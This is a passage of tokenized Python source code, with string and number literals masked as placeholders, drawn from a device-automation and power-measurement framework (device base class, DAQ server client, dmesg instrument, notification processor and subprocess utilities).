azimuth [ '<STR_LIT:data>' ] [ <NUM_LIT:10> ] == <NUM_LIT> <EOL> assert radar . elevation [ '<STR_LIT:data>' ] [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> assert len ( radar . instrument_parameters [ '<STR_LIT>' ] [ '<STR_LIT:data>' ] ) == <NUM_LIT> </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import imp <EOL> import string <EOL> from collections import OrderedDict <EOL> from contextlib import contextmanager <EOL> from wlauto . core . extension import Extension , ExtensionMeta , AttributeCollection , Parameter <EOL> from wlauto . core . extension_loader import ExtensionLoader <EOL> from wlauto . exceptions import DeviceError , ConfigError <EOL> from wlauto . utils . types import list_of_integers , list_of , caseless_string <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RuntimeParameter ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , getter , setter , <EOL> getter_args = None , setter_args = None , <EOL> value_name = '<STR_LIT:value>' , override = False ) : <EOL> """<STR_LIT>""" <EOL> self . name = name <EOL> self . getter = getter <EOL> self . setter = setter <EOL> self . getter_args = getter_args or { } <EOL> self . setter_args = setter_args or { } <EOL> self . value_name = value_name <EOL> self . override = override <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> __repr__ = __str__ <EOL> class CoreParameter ( RuntimeParameter ) : <EOL> """<STR_LIT>""" <EOL> def get_runtime_parameters ( self , core_names ) : <EOL> params = [ ] <EOL> for core in set ( core_names ) : <EOL> name = string . Template ( self . name ) . substitute ( core = core ) <EOL> getter = string . Template ( self . getter ) . substitute ( core = core ) <EOL> setter = string . Template ( self . setter ) . substitute ( core = core ) <EOL> getargs = dict ( self . getter_args . items ( ) + [ ( '<STR_LIT>' , core ) ] ) <EOL> setargs = dict ( self . setter_args . items ( ) + [ ( '<STR_LIT>' , core ) ] ) <EOL> params . append ( RuntimeParameter ( name , getter , setter , getargs , setargs , self . value_name , self . override ) ) <EOL> return params <EOL> class DynamicModuleSpec ( dict ) : <EOL> @ property <EOL> def name ( self ) : <EOL> return self . 
keys ( ) [ <NUM_LIT:0> ] <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> dict . __init__ ( self ) <EOL> if args : <EOL> if len ( args ) > <NUM_LIT:1> : <EOL> raise ValueError ( args ) <EOL> value = args [ <NUM_LIT:0> ] <EOL> else : <EOL> value = kwargs <EOL> if isinstance ( value , basestring ) : <EOL> self [ value ] = { } <EOL> elif isinstance ( value , dict ) and len ( value ) == <NUM_LIT:1> : <EOL> for k , v in value . iteritems ( ) : <EOL> self [ k ] = v <EOL> else : <EOL> raise ValueError ( value ) <EOL> class DeviceMeta ( ExtensionMeta ) : <EOL> to_propagate = ExtensionMeta . to_propagate + [ <EOL> ( '<STR_LIT>' , RuntimeParameter , AttributeCollection ) , <EOL> ( '<STR_LIT>' , DynamicModuleSpec , AttributeCollection ) , <EOL> ] <EOL> class Device ( Extension ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = DeviceMeta <EOL> parameters = [ <EOL> Parameter ( '<STR_LIT>' , kind = list_of ( caseless_string ) , mandatory = True , default = None , <EOL> description = """<STR_LIT>""" ) , <EOL> Parameter ( '<STR_LIT>' , kind = list_of_integers , mandatory = True , default = None , <EOL> description = """<STR_LIT>""" ) , <EOL> ] <EOL> runtime_parameters = [ ] <EOL> dynamic_modules = [ ] <EOL> name = None <EOL> platform = None <EOL> default_working_directory = None <EOL> has_gpu = None <EOL> path_module = None <EOL> active_cores = None <EOL> def __init__ ( self , ** kwargs ) : <EOL> super ( Device , self ) . __init__ ( ** kwargs ) <EOL> if not self . path_module : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> libpath = os . path . dirname ( os . __file__ ) <EOL> modpath = os . path . join ( libpath , self . path_module ) <EOL> if not modpath . lower ( ) . endswith ( '<STR_LIT>' ) : <EOL> modpath += '<STR_LIT>' <EOL> try : <EOL> self . path = imp . load_source ( '<STR_LIT>' , modpath ) <EOL> except IOError : <EOL> raise DeviceError ( '<STR_LIT>' . format ( self . path_module ) ) <EOL> def validate ( self ) : <EOL> if self . core_names and not self . 
core_clusters : <EOL> self . core_clusters = [ ] <EOL> clusters = [ ] <EOL> for cn in self . core_names : <EOL> if cn not in clusters : <EOL> clusters . append ( cn ) <EOL> self . core_clusters . append ( clusters . index ( cn ) ) <EOL> if len ( self . core_names ) != len ( self . core_clusters ) : <EOL> raise ConfigError ( '<STR_LIT>' ) <EOL> def initialize ( self , context ) : <EOL> """<STR_LIT>""" <EOL> loader = ExtensionLoader ( ) <EOL> for module_spec in self . dynamic_modules : <EOL> module = self . _load_module ( loader , module_spec ) <EOL> if not hasattr ( module , '<STR_LIT>' ) : <EOL> message = '<STR_LIT>' <EOL> raise ValueError ( message . format ( module . name ) ) <EOL> if module . probe ( self ) : <EOL> self . logger . debug ( '<STR_LIT>' . format ( module . name ) ) <EOL> self . _install_module ( module ) <EOL> else : <EOL> self . logger . debug ( '<STR_LIT>' . format ( module . name ) ) <EOL> def reset ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def boot ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def connect ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def disconnect ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def ping ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def get_runtime_parameter_names ( self ) : <EOL> return [ p . name for p in self . _expand_runtime_parameters ( ) ] <EOL> def get_runtime_parameters ( self ) : <EOL> """<STR_LIT>""" <EOL> runtime_parameters = OrderedDict ( ) <EOL> for rtp in self . _expand_runtime_parameters ( ) : <EOL> if not rtp . getter : <EOL> continue <EOL> getter = getattr ( self , rtp . getter ) <EOL> rtp_value = getter ( ** rtp . getter_args ) <EOL> runtime_parameters [ rtp . 
name ] = rtp_value <EOL> return runtime_parameters <EOL> def set_runtime_parameters ( self , params ) : <EOL> """<STR_LIT>""" <EOL> runtime_parameters = self . _expand_runtime_parameters ( ) <EOL> rtp_map = { rtp . name . lower ( ) : rtp for rtp in runtime_parameters } <EOL> params = OrderedDict ( ( k . lower ( ) , v ) for k , v in params . iteritems ( ) if v is not None ) <EOL> expected_keys = rtp_map . keys ( ) <EOL> if not set ( params . keys ( ) ) . issubset ( set ( expected_keys ) ) : <EOL> unknown_params = list ( set ( params . keys ( ) ) . difference ( set ( expected_keys ) ) ) <EOL> raise ConfigError ( '<STR_LIT>' . format ( unknown_params ) ) <EOL> for param in params : <EOL> self . logger . debug ( '<STR_LIT>' . format ( param ) ) <EOL> rtp = rtp_map [ param ] <EOL> setter = getattr ( self , rtp . setter ) <EOL> args = dict ( rtp . setter_args . items ( ) + [ ( rtp . value_name , params [ rtp . name . lower ( ) ] ) ] ) <EOL> setter ( ** args ) <EOL> def capture_screen ( self , filepath ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def get_properties ( self , output_path ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def listdir ( self , path , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def push_file ( self , source , dest ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def pull_file ( self , source , dest ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def delete_file ( self , filepath ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def file_exists ( self , filepath ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def get_pids_of ( self , process_name ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def kill ( self , pid , as_root = False ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def killall ( self , process_name , as_root = False ) : <EOL> """<STR_LIT>""" 
<EOL> raise NotImplementedError ( ) <EOL> def install ( self , filepath , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def uninstall ( self , filepath ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def execute ( self , command , timeout = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def set_sysfile_value ( self , filepath , value , verify = True ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def get_sysfile_value ( self , sysfile , kind = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def start ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def stop ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . name ) <EOL> __repr__ = __str__ <EOL> def _expand_runtime_parameters ( self ) : <EOL> expanded_params = [ ] <EOL> for param in self . runtime_parameters : <EOL> if isinstance ( param , CoreParameter ) : <EOL> expanded_params . extend ( param . get_runtime_parameters ( self . core_names ) ) <EOL> else : <EOL> expanded_params . append ( param ) <EOL> return expanded_params <EOL> @ contextmanager <EOL> def _check_alive ( self ) : <EOL> try : <EOL> yield <EOL> except Exception as e : <EOL> self . ping ( ) <EOL> raise e </s>
<s> import os <EOL> import sys <EOL> from twisted . internet import reactor <EOL> from twisted . internet . protocol import Protocol , ClientFactory , ReconnectingClientFactory <EOL> from twisted . internet . error import ConnectionLost , ConnectionDone <EOL> from twisted . protocols . basic import LineReceiver <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . path . append ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:..>' ) ) <EOL> from daqpower import log <EOL> from daqpower . common import DaqServerRequest , DaqServerResponse , Status <EOL> from daqpower . config import get_config_parser <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class Command ( object ) : <EOL> def __init__ ( self , name , ** params ) : <EOL> self . name = name <EOL> self . params = params <EOL> class CommandResult ( object ) : <EOL> def __init__ ( self ) : <EOL> self . status = None <EOL> self . message = None <EOL> self . data = None <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . status , self . message ) <EOL> class CommandExecutorProtocol ( Protocol ) : <EOL> def __init__ ( self , command , timeout = <NUM_LIT:10> , retries = <NUM_LIT:1> ) : <EOL> self . command = command <EOL> self . sent_request = None <EOL> self . waiting_for_response = False <EOL> self . keep_going = None <EOL> self . ports_to_pull = None <EOL> self . factory = None <EOL> self . timeoutCallback = None <EOL> self . timeout = timeout <EOL> self . retries = retries <EOL> self . retry_count = <NUM_LIT:0> <EOL> def connectionMade ( self ) : <EOL> if self . command . name == '<STR_LIT>' : <EOL> self . sendRequest ( '<STR_LIT>' ) <EOL> else : <EOL> self . sendRequest ( self . command . name , ** self . command . params ) <EOL> def connectionLost ( self , reason = ConnectionDone ) : <EOL> if isinstance ( reason , ConnectionLost ) : <EOL> self . errorOut ( '<STR_LIT>' . format ( reason ) ) <EOL> elif self . waiting_for_response : <EOL> self . 
errorOut ( '<STR_LIT>' ) <EOL> else : <EOL> log . debug ( '<STR_LIT>' ) <EOL> def sendRequest ( self , command , ** params ) : <EOL> self . sent_request = DaqServerRequest ( command , params ) <EOL> request_string = self . sent_request . serialize ( ) <EOL> log . debug ( '<STR_LIT>' . format ( request_string ) ) <EOL> self . transport . write ( '<STR_LIT>' . join ( [ request_string , '<STR_LIT:\r\n>' ] ) ) <EOL> self . timeoutCallback = reactor . callLater ( self . timeout , self . requestTimedOut ) <EOL> self . waiting_for_response = True <EOL> def dataReceived ( self , data ) : <EOL> self . keep_going = False <EOL> if self . waiting_for_response : <EOL> self . waiting_for_response = False <EOL> self . timeoutCallback . cancel ( ) <EOL> try : <EOL> response = DaqServerResponse . deserialize ( data ) <EOL> except Exception , e : <EOL> self . errorOut ( '<STR_LIT>' . format ( data , e ) ) <EOL> else : <EOL> if response . status != Status . ERROR : <EOL> self . processResponse ( response ) <EOL> if not self . keep_going : <EOL> self . commandCompleted ( response . status , response . message , response . data ) <EOL> else : <EOL> self . errorOut ( response . message ) <EOL> else : <EOL> self . errorOut ( '<STR_LIT>' . format ( data ) ) <EOL> def processResponse ( self , response ) : <EOL> if self . sent_request . command in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . processPortsResponse ( response ) <EOL> elif self . sent_request . command == '<STR_LIT>' : <EOL> self . processDevicesResponse ( response ) <EOL> elif self . sent_request . command == '<STR_LIT>' : <EOL> self . processPullResponse ( response ) <EOL> def processPortsResponse ( self , response ) : <EOL> if '<STR_LIT>' not in response . data : <EOL> self . errorOut ( '<STR_LIT>' . format ( response , response . data ) ) <EOL> ports = response . data [ '<STR_LIT>' ] <EOL> response . data = ports <EOL> if self . command . name == '<STR_LIT>' : <EOL> if ports : <EOL> self . ports_to_pull = ports <EOL> self . 
sendPullRequest ( self . ports_to_pull . pop ( ) ) <EOL> else : <EOL> response . status = Status . OKISH <EOL> response . message = '<STR_LIT>' <EOL> def processDevicesResponse ( self , response ) : <EOL> if response . status == Status . OK : <EOL> if '<STR_LIT>' not in response . data : <EOL> self . errorOut ( '<STR_LIT>' . format ( response , response . data ) ) <EOL> devices = response . data [ '<STR_LIT>' ] <EOL> response . data = devices <EOL> def sendPullRequest ( self , port_id ) : <EOL> self . sendRequest ( '<STR_LIT>' , port_id = port_id ) <EOL> self . keep_going = True <EOL> def processPullResponse ( self , response ) : <EOL> if '<STR_LIT>' not in response . data : <EOL> self . errorOut ( '<STR_LIT>' . format ( response , response . data ) ) <EOL> port_number = response . data . pop ( '<STR_LIT>' ) <EOL> filename = self . sent_request . params [ '<STR_LIT>' ] + '<STR_LIT>' <EOL> self . factory . initiateFileTransfer ( filename , port_number ) <EOL> if self . ports_to_pull : <EOL> self . sendPullRequest ( self . ports_to_pull . pop ( ) ) <EOL> def commandCompleted ( self , status , message = None , data = None ) : <EOL> self . factory . result . status = status <EOL> self . factory . result . message = message <EOL> self . factory . result . data = data <EOL> self . transport . loseConnection ( ) <EOL> def requestTimedOut ( self ) : <EOL> self . retry_count += <NUM_LIT:1> <EOL> if self . retry_count > self . retries : <EOL> self . errorOut ( "<STR_LIT>" ) <EOL> else : <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . connectionMade ( ) <EOL> def errorOut ( self , message ) : <EOL> self . factory . errorOut ( message ) <EOL> class CommandExecutorFactory ( ClientFactory ) : <EOL> protocol = CommandExecutorProtocol <EOL> wait_delay = <NUM_LIT:1> <EOL> def __init__ ( self , config , command , timeout = <NUM_LIT:10> , retries = <NUM_LIT:1> ) : <EOL> self . config = config <EOL> self . command = command <EOL> self . timeout = timeout <EOL> self . 
retries = retries <EOL> self . result = CommandResult ( ) <EOL> self . done = False <EOL> self . transfers_in_progress = { } <EOL> if command . name == '<STR_LIT>' : <EOL> if '<STR_LIT>' not in command . params : <EOL> self . errorOut ( '<STR_LIT>' ) <EOL> self . output_directory = command . params [ '<STR_LIT>' ] <EOL> if not os . path . isdir ( self . output_directory ) : <EOL> log . debug ( '<STR_LIT>' . format ( self . output_directory ) ) <EOL> os . makedirs ( self . output_directory ) <EOL> def buildProtocol ( self , addr ) : <EOL> protocol = CommandExecutorProtocol ( self . command , self . timeout , self . retries ) <EOL> protocol . factory = self <EOL> return protocol <EOL> def initiateFileTransfer ( self , filename , port ) : <EOL> log . debug ( '<STR_LIT>' . format ( filename , port ) ) <EOL> filepath = os . path . join ( self . output_directory , filename ) <EOL> session = FileReceiverFactory ( filepath , self ) <EOL> connector = reactor . connectTCP ( self . config . host , port , session ) <EOL> self . transfers_in_progress [ session ] = connector <EOL> def transferComplete ( self , session ) : <EOL> connector = self . transfers_in_progress [ session ] <EOL> log . debug ( '<STR_LIT>' . format ( connector . port ) ) <EOL> del self . transfers_in_progress [ session ] <EOL> def clientConnectionLost ( self , connector , reason ) : <EOL> if self . transfers_in_progress : <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . waitForTransfersToCompleteAndExit ( ) <EOL> def clientConnectionFailed ( self , connector , reason ) : <EOL> self . result . status = Status . ERROR <EOL> self . result . message = '<STR_LIT>' <EOL> self . waitForTransfersToCompleteAndExit ( ) <EOL> def waitForTransfersToCompleteAndExit ( self ) : <EOL> if self . transfers_in_progress : <EOL> reactor . callLater ( self . wait_delay , self . waitForTransfersToCompleteAndExit ) <EOL> else : <EOL> log . debug ( '<STR_LIT>' ) <EOL> reactor . 
stop ( ) <EOL> def errorOut ( self , message ) : <EOL> self . result . status = Status . ERROR <EOL> self . result . message = message <EOL> reactor . crash ( ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . command . name ) <EOL> __repr__ = __str__ <EOL> class FileReceiver ( LineReceiver ) : <EOL> def __init__ ( self , path ) : <EOL> self . path = path <EOL> self . fh = None <EOL> self . factory = None <EOL> def connectionMade ( self ) : <EOL> if os . path . isfile ( self . path ) : <EOL> log . warning ( '<STR_LIT>' ) <EOL> os . remove ( self . path ) <EOL> self . fh = open ( self . path , '<STR_LIT:w>' ) <EOL> def connectionLost ( self , reason = ConnectionDone ) : <EOL> if self . fh : <EOL> self . fh . close ( ) <EOL> def lineReceived ( self , line ) : <EOL> line = line . rstrip ( '<STR_LIT:\r\n>' ) + '<STR_LIT:\n>' <EOL> self . fh . write ( line ) <EOL> class FileReceiverFactory ( ReconnectingClientFactory ) : <EOL> def __init__ ( self , path , owner ) : <EOL> self . path = path <EOL> self . owner = owner <EOL> def buildProtocol ( self , addr ) : <EOL> protocol = FileReceiver ( self . path ) <EOL> protocol . factory = self <EOL> self . resetDelay ( ) <EOL> return protocol <EOL> def clientConnectionLost ( self , conector , reason ) : <EOL> if isinstance ( reason , ConnectionLost ) : <EOL> log . error ( '<STR_LIT>' . format ( reason ) ) <EOL> ReconnectingClientFactory . clientConnectionLost ( self , conector , reason ) <EOL> else : <EOL> self . owner . transferComplete ( self ) <EOL> def clientConnectionFailed ( self , conector , reason ) : <EOL> if isinstance ( reason , ConnectionLost ) : <EOL> log . error ( '<STR_LIT>' . format ( reason ) ) <EOL> ReconnectingClientFactory . clientConnectionFailed ( self , conector , reason ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . 
path ) <EOL> __repr__ = __str__ <EOL> def execute_command ( server_config , command , ** kwargs ) : <EOL> before_fds = _get_open_fds ( ) <EOL> if isinstance ( command , basestring ) : <EOL> command = Command ( command , ** kwargs ) <EOL> timeout = <NUM_LIT> if command . name in [ '<STR_LIT>' , '<STR_LIT>' ] else <NUM_LIT:10> <EOL> factory = CommandExecutorFactory ( server_config , command , timeout ) <EOL> from twisted . internet import default <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> default . install ( ) <EOL> global reactor <EOL> reactor = sys . modules [ '<STR_LIT>' ] <EOL> try : <EOL> reactor . connectTCP ( server_config . host , server_config . port , factory ) <EOL> reactor . run ( ) <EOL> return factory . result <EOL> finally : <EOL> import signal <EOL> signal . signal ( signal . SIGINT , signal . default_int_handler ) <EOL> after_fds = _get_open_fds ( ) <EOL> for fd in after_fds - before_fds : <EOL> try : <EOL> os . close ( int ( fd [ <NUM_LIT:1> : ] ) ) <EOL> except OSError : <EOL> pass <EOL> def _get_open_fds ( ) : <EOL> if os . name == '<STR_LIT>' : <EOL> import subprocess <EOL> pid = os . getpid ( ) <EOL> procs = subprocess . check_output ( [ "<STR_LIT>" , '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" , str ( pid ) ] ) <EOL> return set ( procs . split ( ) ) <EOL> else : <EOL> return [ ] <EOL> def run_send_command ( ) : <EOL> """<STR_LIT>""" <EOL> parser = get_config_parser ( ) <EOL> parser . add_argument ( '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , metavar = '<STR_LIT>' , default = '<STR_LIT:.>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , action = '<STR_LIT:store_true>' , default = False ) <EOL> args = parser . parse_args ( ) <EOL> if not args . device_config . labels : <EOL> args . device_config . labels = [ '<STR_LIT>' . format ( i ) for i in xrange ( len ( args . device_config . resistor_values ) ) ] <EOL> if args . verbose : <EOL> log . 
start_logging ( '<STR_LIT>' ) <EOL> else : <EOL> log . start_logging ( '<STR_LIT>' , fmt = '<STR_LIT>' ) <EOL> if args . command == '<STR_LIT>' : <EOL> args . device_config . validate ( ) <EOL> command = Command ( args . command , config = args . device_config ) <EOL> elif args . command == '<STR_LIT>' : <EOL> command = Command ( args . command , output_directory = args . output_directory ) <EOL> else : <EOL> command = Command ( args . command ) <EOL> result = execute_command ( args . server_config , command ) <EOL> print result <EOL> if result . data : <EOL> print result . data <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> run_send_command ( ) </s>
<s> import os <EOL> from wlauto import Instrument , Parameter <EOL> from wlauto . utils . misc import ensure_file_directory_exists as _f <EOL> class DmesgInstrument ( Instrument ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> parameters = [ <EOL> Parameter ( '<STR_LIT>' , kind = int , allowed_values = range ( <NUM_LIT:8> ) , <EOL> description = '<STR_LIT>' ) <EOL> ] <EOL> loglevel_file = '<STR_LIT>' <EOL> def setup ( self , context ) : <EOL> if self . loglevel : <EOL> self . old_loglevel = self . device . get_sysfile_value ( self . loglevel_file ) <EOL> self . device . set_sysfile_value ( self . loglevel_file , self . loglevel , verify = False ) <EOL> self . before_file = _f ( os . path . join ( context . output_directory , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . after_file = _f ( os . path . join ( context . output_directory , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def slow_start ( self , context ) : <EOL> with open ( self . before_file , '<STR_LIT:w>' ) as wfh : <EOL> wfh . write ( self . device . execute ( '<STR_LIT>' ) ) <EOL> context . add_artifact ( '<STR_LIT>' , self . before_file , kind = '<STR_LIT:data>' ) <EOL> if self . device . is_rooted : <EOL> self . device . execute ( '<STR_LIT>' , as_root = True ) <EOL> def slow_stop ( self , context ) : <EOL> with open ( self . after_file , '<STR_LIT:w>' ) as wfh : <EOL> wfh . write ( self . device . execute ( '<STR_LIT>' ) ) <EOL> context . add_artifact ( '<STR_LIT>' , self . after_file , kind = '<STR_LIT:data>' ) <EOL> def teardown ( self , context ) : <EOL> if self . loglevel : <EOL> self . device . set_sysfile_value ( self . loglevel_file , self . old_loglevel , verify = False ) </s>
<s> import collections <EOL> import sys <EOL> try : <EOL> import notify2 <EOL> except ImportError : <EOL> notify2 = None <EOL> from wlauto import ResultProcessor <EOL> from wlauto . core . result import IterationResult <EOL> from wlauto . exceptions import ResultProcessorError <EOL> class NotifyProcessor ( ResultProcessor ) : <EOL> name = '<STR_LIT>' <EOL> description = '''<STR_LIT>''' <EOL> def initialize ( self , context ) : <EOL> if sys . platform != '<STR_LIT>' : <EOL> raise ResultProcessorError ( '<STR_LIT>' ) <EOL> if not notify2 : <EOL> raise ResultProcessorError ( '<STR_LIT>' ) <EOL> notify2 . init ( "<STR_LIT>" ) <EOL> def process_run_result ( self , result , context ) : <EOL> num_iterations = sum ( context . job_iteration_counts . values ( ) ) <EOL> counter = collections . Counter ( ) <EOL> for result in result . iteration_results : <EOL> counter [ result . status ] += <NUM_LIT:1> <EOL> score_board = [ ] <EOL> for status in IterationResult . values : <EOL> if status in counter : <EOL> score_board . append ( '<STR_LIT>' . format ( counter [ status ] , status ) ) <EOL> summary = '<STR_LIT>' <EOL> body = '<STR_LIT>' . format ( num_iterations ) <EOL> body += '<STR_LIT:U+002CU+0020>' . join ( score_board ) <EOL> notification = notify2 . Notification ( summary , body ) <EOL> if not notification . show ( ) : <EOL> self . logger . warning ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import os <EOL> import sys <EOL> import re <EOL> import math <EOL> import imp <EOL> import string <EOL> import threading <EOL> import signal <EOL> import pkgutil <EOL> import traceback <EOL> import logging <EOL> import random <EOL> import hashlib <EOL> import subprocess <EOL> from subprocess import CalledProcessError <EOL> from datetime import datetime , timedelta <EOL> from operator import mul , itemgetter <EOL> from StringIO import StringIO <EOL> from itertools import cycle , groupby <EOL> from functools import partial <EOL> from distutils . spawn import find_executable <EOL> import yaml <EOL> from dateutil import tz <EOL> ABI_MAP = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } <EOL> def preexec_function ( ) : <EOL> signal . signal ( signal . SIGINT , signal . SIG_IGN ) <EOL> os . setpgrp ( ) <EOL> check_output_logger = logging . getLogger ( '<STR_LIT>' ) <EOL> class TimeoutError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , command , output ) : <EOL> super ( TimeoutError , self ) . __init__ ( '<STR_LIT>' . format ( command ) ) <EOL> self . command = command <EOL> self . output = output <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT:\n>' . join ( [ self . message , '<STR_LIT>' , self . output or '<STR_LIT>' ] ) <EOL> class CalledProcessErrorWithStderr ( CalledProcessError ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . error = kwargs . pop ( "<STR_LIT:error>" ) <EOL> super ( CalledProcessErrorWithStderr , self ) . 
__init__ ( * args , ** kwargs ) <EOL> def check_output ( command , timeout = None , ignore = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if ignore is None : <EOL> ignore = [ ] <EOL> elif isinstance ( ignore , int ) : <EOL> ignore = [ ignore ] <EOL> elif not isinstance ( ignore , list ) and ignore != '<STR_LIT:all>' : <EOL> message = '<STR_LIT>' <EOL> raise ValueError ( message . format ( ignore ) ) <EOL> if '<STR_LIT>' in kwargs : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> def callback ( pid ) : <EOL> try : <EOL> check_output_logger . debug ( '<STR_LIT>' . format ( pid ) ) <EOL> os . killpg ( pid , signal . SIGKILL ) <EOL> except OSError : <EOL> pass <EOL> process = subprocess . Popen ( command , stdout = subprocess . PIPE , stderr = subprocess . PIPE , <EOL> preexec_fn = preexec_function , ** kwargs ) <EOL> if timeout : <EOL> timer = threading . Timer ( timeout , callback , [ process . pid , ] ) <EOL> timer . start ( ) <EOL> try : <EOL> output , error = process . communicate ( ) <EOL> finally : <EOL> if timeout : <EOL> timer . cancel ( ) <EOL> retcode = process . poll ( ) <EOL> if retcode : <EOL> if retcode == - <NUM_LIT:9> : <EOL> raise TimeoutError ( command , output = '<STR_LIT:\n>' . join ( [ output , error ] ) ) <EOL> elif ignore != '<STR_LIT:all>' and retcode not in ignore : <EOL> raise CalledProcessErrorWithStderr ( retcode , command , output = output , error = error ) <EOL> return output , error <EOL> def walk_modules ( path ) : <EOL> """<STR_LIT>""" <EOL> root_mod = __import__ ( path , { } , { } , [ '<STR_LIT>' ] ) <EOL> mods = [ root_mod ] <EOL> for _ , name , ispkg in pkgutil . iter_modules ( root_mod . __path__ ) : <EOL> submod_path = '<STR_LIT:.>' . join ( [ path , name ] ) <EOL> if ispkg : <EOL> mods . extend ( walk_modules ( submod_path ) ) <EOL> else : <EOL> submod = __import__ ( submod_path , { } , { } , [ '<STR_LIT>' ] ) <EOL> mods . 
append ( submod ) <EOL> return mods <EOL> def ensure_directory_exists ( dirpath ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . isdir ( dirpath ) : <EOL> os . makedirs ( dirpath ) <EOL> return dirpath <EOL> def ensure_file_directory_exists ( filepath ) : <EOL> """<STR_LIT>""" <EOL> ensure_directory_exists ( os . path . dirname ( filepath ) ) <EOL> return filepath <EOL> def diff_tokens ( before_token , after_token ) : <EOL> """<STR_LIT>""" <EOL> if before_token . isspace ( ) and after_token . isspace ( ) : <EOL> return after_token <EOL> elif before_token . isdigit ( ) and after_token . isdigit ( ) : <EOL> try : <EOL> diff = int ( after_token ) - int ( before_token ) <EOL> return str ( diff ) <EOL> except ValueError : <EOL> return "<STR_LIT>" % ( before_token , after_token ) <EOL> elif before_token == after_token : <EOL> return after_token <EOL> else : <EOL> return "<STR_LIT>" % ( before_token , after_token ) <EOL> def prepare_table_rows ( rows ) : <EOL> """<STR_LIT>""" <EOL> rows = [ map ( str , r ) for r in rows ] <EOL> max_cols = max ( map ( len , rows ) ) <EOL> for row in rows : <EOL> pad = max_cols - len ( row ) <EOL> for _ in xrange ( pad ) : <EOL> row . append ( '<STR_LIT>' ) <EOL> return rows <EOL> def write_table ( rows , wfh , align = '<STR_LIT:>>' , headers = None ) : <EOL> """<STR_LIT>""" <EOL> if not rows : <EOL> return <EOL> rows = prepare_table_rows ( rows ) <EOL> num_cols = len ( rows [ <NUM_LIT:0> ] ) <EOL> it = cycle ( align ) <EOL> align = [ it . next ( ) for _ in xrange ( num_cols ) ] <EOL> cols = zip ( * rows ) <EOL> col_widths = [ max ( map ( len , c ) ) for c in cols ] <EOL> row_format = '<STR_LIT:U+0020>' . join ( [ '<STR_LIT>' % ( align [ i ] , w ) for i , w in enumerate ( col_widths ) ] ) <EOL> row_format += '<STR_LIT:\n>' <EOL> if headers : <EOL> wfh . write ( row_format . format ( * headers ) ) <EOL> underlines = [ '<STR_LIT:->' * len ( h ) for h in headers ] <EOL> wfh . write ( row_format . 
